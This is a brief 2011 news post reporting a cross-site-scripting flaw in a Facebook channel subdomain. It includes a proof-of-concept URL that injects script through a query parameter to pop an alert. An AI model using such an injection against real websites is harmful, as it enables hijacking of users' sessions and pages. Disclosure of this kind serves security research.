Channel.facebook.com cross-site-scripting (XSS) vulnerability by Edgard Chammas - The Hacker News
Loading
Sign up for Quick Updates

Channel.facebook.com cross-site-scripting (XSS) vulnerability by Edgard Chammas

Author: Mohit Kumar onSunday, April 03, 2011
Follow Us

Channel.facebook.com cross-site-scripting (XSS) vulnerability by Edgard Chammas
Security researcher Edgard Chammas, has submitted on 02/04/2011 a cross-site-scripting (XSS) vulnerability affecting 1.61.channel.facebook.com, which at the time of submission ranked 2 on the web according to Alexa. It is currently unfixed.
Link : http://1.61.channel.facebook.com/iframe/11?r=http://static.ak.fbcdn.net/rsrc.php/1.js%22%3E%3C/script%3E%3Cscript%3Ealert(%22The%20Hacker%20News%22)%3C/script%3E%3Cscript%3E

Author Info

photo of Mohit Kumar

aka 'Unix Root' is Founder and Editor-in-chief of 'The Hacker News'. He is a Security Researcher and Analyst, with experience in various aspects of Information Security. Other than this : He is an Internet Activist, Strong supporter of Anonymous & Wikileaks. Follow him @ Twitter | LinkedIn | | | Facebook Profile